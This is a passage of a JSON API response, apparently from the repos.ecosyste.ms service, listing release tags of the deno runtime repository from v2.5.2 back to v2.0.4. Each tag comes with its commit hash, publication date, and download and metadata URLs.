/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/d